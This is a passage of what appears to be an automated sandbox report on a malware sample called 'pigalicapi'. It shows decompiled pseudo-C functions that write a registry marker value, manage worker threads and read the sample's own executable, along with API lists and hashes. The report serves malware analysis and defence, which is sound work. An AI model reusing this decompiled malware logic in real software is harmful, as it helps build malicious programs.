                                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                    • String ID: Ackxwgsxooono$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                    • API String ID: 4161867159-3235977568
                                                                                                                                                                                                                                                    • Opcode ID: a4d8e3a5552a49718be12a882221a6161b9e6d1f5f73e61383235332e1b9d9f5
                                                                                                                                                                                                                                                    • Instruction ID: 454e8ff05321ea7681520e6c7218e48aa34f3f3b0e3e27a6d3f1999ea60e841d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4d8e3a5552a49718be12a882221a6161b9e6d1f5f73e61383235332e1b9d9f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9316E76600308FFDB10DFA8DD4AFAA7BB4EB04704F109518FA19BB280D772A9568B50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC5F30() {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    				signed int _v9;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                                                                    				int _v292;
                                                                                                                                                                                                                                                    				char _v324;
                                                                                                                                                                                                                                                    				int _v328;
                                                                                                                                                                                                                                                    				char _t27;
                                                                                                                                                                                                                                                    				CHAR* _t30;
                                                                                                                                                                                                                                                    				long _t37;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v9 = 0;
                                                                                                                                                                                                                                                    				_t27 =  *0xed18a0; // 0xed3b88
                                                                                                                                                                                                                                                    				_v8 = _t27;
                                                                                                                                                                                                                                                    				E00EC7D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                    				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                    				_t30 =  *0xed1898; // 0xed3fe2
                                                                                                                                                                                                                                                    				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                    				_v16 = 0x80000001;
                                                                                                                                                                                                                                                    				if(( *0xed435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    					_v16 = 0x80000002;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                    				_t10 =  &_v8; // 0xec3c58
                                                                                                                                                                                                                                                    				if(RegOpenKeyExA(_v16,  *_t10, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                    					_v292 = 0x20;
                                                                                                                                                                                                                                                    					_v288 = 0x20;
                                                                                                                                                                                                                                                    					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                                                                    						_v9 = 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                    					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    						_v328 = 0x10;
                                                                                                                                                                                                                                                    						E00EC9BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                    						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					RegCloseKey(_v20);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v9;
                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                    0x00ec5f39
                                                                                                                                                                                                                                                    0x00ec5f3d
                                                                                                                                                                                                                                                    0x00ec5f42
                                                                                                                                                                                                                                                    0x00ec5f53
                                                                                                                                                                                                                                                    0x00ec5f67
                                                                                                                                                                                                                                                    0x00ec5f6d
                                                                                                                                                                                                                                                    0x00ec5f7a
                                                                                                                                                                                                                                                    0x00ec5f80
                                                                                                                                                                                                                                                    0x00ec5f90
                                                                                                                                                                                                                                                    0x00ec5f92
                                                                                                                                                                                                                                                    0x00ec5f92
                                                                                                                                                                                                                                                    0x00ec5f99
                                                                                                                                                                                                                                                    0x00ec5fab
                                                                                                                                                                                                                                                    0x00ec5fbb
                                                                                                                                                                                                                                                    0x00ec5fc1
                                                                                                                                                                                                                                                    0x00ec5fcb
                                                                                                                                                                                                                                                    0x00ec5ff2
                                                                                                                                                                                                                                                    0x00ec5ffa
                                                                                                                                                                                                                                                    0x00ec5ffc
                                                                                                                                                                                                                                                    0x00ec5ffc
                                                                                                                                                                                                                                                    0x00ec6000
                                                                                                                                                                                                                                                    0x00ec6006
                                                                                                                                                                                                                                                    0x00ec6008
                                                                                                                                                                                                                                                    0x00ec601b
                                                                                                                                                                                                                                                    0x00ec603b
                                                                                                                                                                                                                                                    0x00ec603b
                                                                                                                                                                                                                                                    0x00ec6045
                                                                                                                                                                                                                                                    0x00ec6045
                                                                                                                                                                                                                                                    0x00ec6051

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,pigalicapi), ref: 00EC5F67
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00ED3FE2), ref: 00EC5F7A
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,X<,00000000,000F003F,00000000), ref: 00EC5FB3
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 00EC5FF2
                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00EC603B
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EC6045
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                    • String ID: $ $X<$pigalicapi$?
                                                                                                                                                                                                                                                    • API String ID: 764223185-3904927168
                                                                                                                                                                                                                                                    • Opcode ID: 65b5a18a5628443eb5895b5a307ff50125895e08b6a7c32edfa0e4af727c58c8
                                                                                                                                                                                                                                                    • Instruction ID: 53dab171eb89f6a4674e774d285ed0650600d66a90d48f9e91be48293fcd52e7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65b5a18a5628443eb5895b5a307ff50125895e08b6a7c32edfa0e4af727c58c8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 093154B590021CAFDB24CB91DC46FFEB778AB08704F04459CFA09B6281D7B65A45DF61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC4096() {
                                                                                                                                                                                                                                                    				void _t92;
                                                                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                                                                    				void* _t161;
                                                                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                                                                    				void* _t166;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                    					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                    					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                    						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                    						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                    						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                    					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                    						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                    						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                    					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                    					_t92 = CreateThread(0, 0, E00EC4AC0, _t161 - 0x34, 0, 0); // executed
                                                                                                                                                                                                                                                    					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                    					 *(_t161 - 0x64) = E00EC97A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                    					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                    					E00EC7D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                    					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                    					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                    					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                    						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                    						E00EC7D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                    						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                    						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                    						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                    						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                    						_t114 = CreateThread(0, 0, E00EC4BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                    						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                    						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                    						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                    						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                    						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                    						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                                                    					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                    					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                    						VirtualFree( *(_t161 - 0x30), 0, 0x8000); // executed
                                                                                                                                                                                                                                                    						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                    						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                                                                    					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                    					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                    					E00EC97C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                    					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L22:
                                                                                                                                                                                                                                                    				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                    				return  *(_t161 - 1);
                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                    0x00ec4096
                                                                                                                                                                                                                                                    0x00ec4096
                                                                                                                                                                                                                                                    0x00ec4096
                                                                                                                                                                                                                                                    0x00ec409c
                                                                                                                                                                                                                                                    0x00ec40a5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec40ab
                                                                                                                                                                                                                                                    0x00ec40af
                                                                                                                                                                                                                                                    0x00ec40b9
                                                                                                                                                                                                                                                    0x00ec40c6
                                                                                                                                                                                                                                                    0x00ec40cc
                                                                                                                                                                                                                                                    0x00ec40d3
                                                                                                                                                                                                                                                    0x00ec40d3
                                                                                                                                                                                                                                                    0x00ec40da
                                                                                                                                                                                                                                                    0x00ec40de
                                                                                                                                                                                                                                                    0x00ec40e6
                                                                                                                                                                                                                                                    0x00ec40ec
                                                                                                                                                                                                                                                    0x00ec40ec
                                                                                                                                                                                                                                                    0x00ec40f7
                                                                                                                                                                                                                                                    0x00ec4101
                                                                                                                                                                                                                                                    0x00ec4118
                                                                                                                                                                                                                                                    0x00ec411e
                                                                                                                                                                                                                                                    0x00ec413d
                                                                                                                                                                                                                                                    0x00ec4143
                                                                                                                                                                                                                                                    0x00ec4153
                                                                                                                                                                                                                                                    0x00ec4158
                                                                                                                                                                                                                                                    0x00ec415b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec416d
                                                                                                                                                                                                                                                    0x00ec417f
                                                                                                                                                                                                                                                    0x00ec418e
                                                                                                                                                                                                                                                    0x00ec4193
                                                                                                                                                                                                                                                    0x00ec4199
                                                                                                                                                                                                                                                    0x00ec419f
                                                                                                                                                                                                                                                    0x00ec41a5
                                                                                                                                                                                                                                                    0x00ec41af
                                                                                                                                                                                                                                                    0x00ec41bb
                                                                                                                                                                                                                                                    0x00ec41d2
                                                                                                                                                                                                                                                    0x00ec41bd
                                                                                                                                                                                                                                                    0x00ec41c7
                                                                                                                                                                                                                                                    0x00ec41c7
                                                                                                                                                                                                                                                    0x00ec41e3
                                                                                                                                                                                                                                                    0x00ec41f7
                                                                                                                                                                                                                                                    0x00ec4203
                                                                                                                                                                                                                                                    0x00ec420c
                                                                                                                                                                                                                                                    0x00ec4216
                                                                                                                                                                                                                                                    0x00ec416a
                                                                                                                                                                                                                                                    0x00ec416a
                                                                                                                                                                                                                                                    0x00ec422d
                                                                                                                                                                                                                                                    0x00ec4242
                                                                                                                                                                                                                                                    0x00ec4249
                                                                                                                                                                                                                                                    0x00ec424b
                                                                                                                                                                                                                                                    0x00ec424b
                                                                                                                                                                                                                                                    0x00ec425e
                                                                                                                                                                                                                                                    0x00ec4265
                                                                                                                                                                                                                                                    0x00ec426d
                                                                                                                                                                                                                                                    0x00ec426d
                                                                                                                                                                                                                                                    0x00ec4273
                                                                                                                                                                                                                                                    0x00ec4277
                                                                                                                                                                                                                                                    0x00ec4281
                                                                                                                                                                                                                                                    0x00ec428e
                                                                                                                                                                                                                                                    0x00ec4294
                                                                                                                                                                                                                                                    0x00ec429b
                                                                                                                                                                                                                                                    0x00ec429b
                                                                                                                                                                                                                                                    0x00ec42a2
                                                                                                                                                                                                                                                    0x00ec42a6
                                                                                                                                                                                                                                                    0x00ec42af
                                                                                                                                                                                                                                                    0x00ec42b6
                                                                                                                                                                                                                                                    0x00ec42c4
                                                                                                                                                                                                                                                    0x00ec42c8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec42c8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec42c4
                                                                                                                                                                                                                                                    0x00ec42cd
                                                                                                                                                                                                                                                    0x00ec42d1
                                                                                                                                                                                                                                                    0x00ec42dd

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?), ref: 00EC40AF
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00EC40C6
                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 00EC40E6
                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000000), ref: 00EC40F7
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00EC4101
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00EC4118
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EC41DD
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00EC41F7
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EC420C
                                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 00EC4216
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?), ref: 00EC42D1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateCriticalSectionThread$Event$ChangeCloseDeleteEnterFindFreeLeaveNotificationObjectResetSingleTerminateVirtualWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 371823443-0
                                                                                                                                                                                                                                                    • Opcode ID: 503df5c8905022a2de54f79e40fc7e43c111c444b34961bbbd6a176695276d14
                                                                                                                                                                                                                                                    • Instruction ID: a2ff048fc95435e339263120abff37f0c026b7af1170a0d4327d9188e3ae7466
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503df5c8905022a2de54f79e40fc7e43c111c444b34961bbbd6a176695276d14
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE51E4B1A41308AFDB14DFA4D99AFEDBBB1BB48704F244119F905BB2D0D772A846CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC5E30(char _a4) {
                                                                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                                                                    				char _v9;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                    				char* _v24;
                                                                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                                                                    				signed int _v29;
                                                                                                                                                                                                                                                    				int _v36;
                                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                                    				int _v72;
                                                                                                                                                                                                                                                    				char* _t31;
                                                                                                                                                                                                                                                    				long _t33;
                                                                                                                                                                                                                                                    				long _t37;
                                                                                                                                                                                                                                                    				char* _t45;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v9 = 0;
                                                                                                                                                                                                                                                    				_t31 =  *0xed18a0; // 0xed3b88
                                                                                                                                                                                                                                                    				_v8 = _t31;
                                                                                                                                                                                                                                                    				_t45 =  *0xed1894; // 0xed3fc4
                                                                                                                                                                                                                                                    				_v24 = _t45;
                                                                                                                                                                                                                                                    				_v16 = 0x80000001;
                                                                                                                                                                                                                                                    				if(( *0xed435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    					_v16 = 0x80000002;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                    				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                                                                                                    					_v36 = 0x20;
                                                                                                                                                                                                                                                    					_v28 = 0x20;
                                                                                                                                                                                                                                                    					_v29 = 0;
                                                                                                                                                                                                                                                    					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                    					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                    						_v29 = 1;
                                                                                                                                                                                                                                                    						_t19 =  &_a4; // 0xec3c39
                                                                                                                                                                                                                                                    						if(( *_t19 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                    					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    						_v72 = 0x10;
                                                                                                                                                                                                                                                    						E00EC9BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                    						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10);
                                                                                                                                                                                                                                                    						_v9 = 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v9;
                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                    0x00ec5e36
                                                                                                                                                                                                                                                    0x00ec5e3a
                                                                                                                                                                                                                                                    0x00ec5e3f
                                                                                                                                                                                                                                                    0x00ec5e42
                                                                                                                                                                                                                                                    0x00ec5e48
                                                                                                                                                                                                                                                    0x00ec5e4b
                                                                                                                                                                                                                                                    0x00ec5e5b
                                                                                                                                                                                                                                                    0x00ec5e5d
                                                                                                                                                                                                                                                    0x00ec5e5d
                                                                                                                                                                                                                                                    0x00ec5e64
                                                                                                                                                                                                                                                    0x00ec5e7e
                                                                                                                                                                                                                                                    0x00ec5e86
                                                                                                                                                                                                                                                    0x00ec5e8c
                                                                                                                                                                                                                                                    0x00ec5e93
                                                                                                                                                                                                                                                    0x00ec5e9a
                                                                                                                                                                                                                                                    0x00ec5eb2
                                                                                                                                                                                                                                                    0x00ec5eba
                                                                                                                                                                                                                                                    0x00ec5ec2
                                                                                                                                                                                                                                                    0x00ec5ec6
                                                                                                                                                                                                                                                    0x00ec5ecc
                                                                                                                                                                                                                                                    0x00ec5ed6
                                                                                                                                                                                                                                                    0x00ec5ed6
                                                                                                                                                                                                                                                    0x00ec5ecc
                                                                                                                                                                                                                                                    0x00ec5edc
                                                                                                                                                                                                                                                    0x00ec5ee2
                                                                                                                                                                                                                                                    0x00ec5ee4
                                                                                                                                                                                                                                                    0x00ec5ef1
                                                                                                                                                                                                                                                    0x00ec5f0b
                                                                                                                                                                                                                                                    0x00ec5f11
                                                                                                                                                                                                                                                    0x00ec5f11
                                                                                                                                                                                                                                                    0x00ec5f19
                                                                                                                                                                                                                                                    0x00ec5f19
                                                                                                                                                                                                                                                    0x00ec5f25

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 00EC5E7E
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 00EC5EB2
                                                                                                                                                                                                                                                    • RegDeleteValueA.ADVAPI32(00000000,?), ref: 00EC5ED6
                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 00EC5F0B
                                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 00EC5F19
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                    • String ID: $ $9<
                                                                                                                                                                                                                                                    • API String ID: 647993726-683406120
                                                                                                                                                                                                                                                    • Opcode ID: 19424fd43166283f29cf1872ce7f29f0074e541bf5223e8f8a400597b480311a
                                                                                                                                                                                                                                                    • Instruction ID: f0298966e080085650695b797e858b19df50b8cb5f6ea7e8872a4fc41c3ff7d5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19424fd43166283f29cf1872ce7f29f0074e541bf5223e8f8a400597b480311a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96315CB1A00249AFEB04CBD5D955FFFBBB9AB04704F14405CEA04B7281D7B66A06CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC4510(intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				char _v780;
                                                                                                                                                                                                                                                    				void* _v784;
                                                                                                                                                                                                                                                    				char _v1308;
                                                                                                                                                                                                                                                    				long _v1312;
                                                                                                                                                                                                                                                    				void* _v1316;
                                                                                                                                                                                                                                                    				long _v1320;
                                                                                                                                                                                                                                                    				intOrPtr _v1324;
                                                                                                                                                                                                                                                    				intOrPtr _v1328;
                                                                                                                                                                                                                                                    				signed int _v1332;
                                                                                                                                                                                                                                                    				intOrPtr _v1336;
                                                                                                                                                                                                                                                    				intOrPtr _v1340;
                                                                                                                                                                                                                                                    				intOrPtr _v1344;
                                                                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                                                    				int _t97;
                                                                                                                                                                                                                                                    				signed char _t101;
                                                                                                                                                                                                                                                    				signed char _t114;
                                                                                                                                                                                                                                                    				void* _t153;
                                                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                                                    				void* _t156;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                                    					return _v5;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					E00EC7D20(E00EC7D20( &_v780,  &_v780, 0, 0x300),  &_v1308, 0, 0x208);
                                                                                                                                                                                                                                                    					_t155 = _t153 + 0x18;
                                                                                                                                                                                                                                                    					GetModuleFileNameA(0,  &_v1308, 0x208);
                                                                                                                                                                                                                                                    					_t90 = CreateFileA( &_v1308, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                    					_v784 = _t90;
                                                                                                                                                                                                                                                    					if(_v784 == 0xffffffff) {
                                                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v1312 = GetFileSize(_v784, 0);
                                                                                                                                                                                                                                                    					if(_v1312 == 0) {
                                                                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                                                                    						if(_v784 != 0) {
                                                                                                                                                                                                                                                    							CloseHandle(_v784);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t94 = VirtualAlloc(0, _v1312, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    					_v1316 = _t94;
                                                                                                                                                                                                                                                    					if(_v1316 == 0) {
                                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v1320 = 0;
                                                                                                                                                                                                                                                    					_t97 = ReadFile(_v784, _v1316, _v1312,  &_v1320, 0); // executed
                                                                                                                                                                                                                                                    					if(_t97 == 0 || _v1320 != _v1312) {
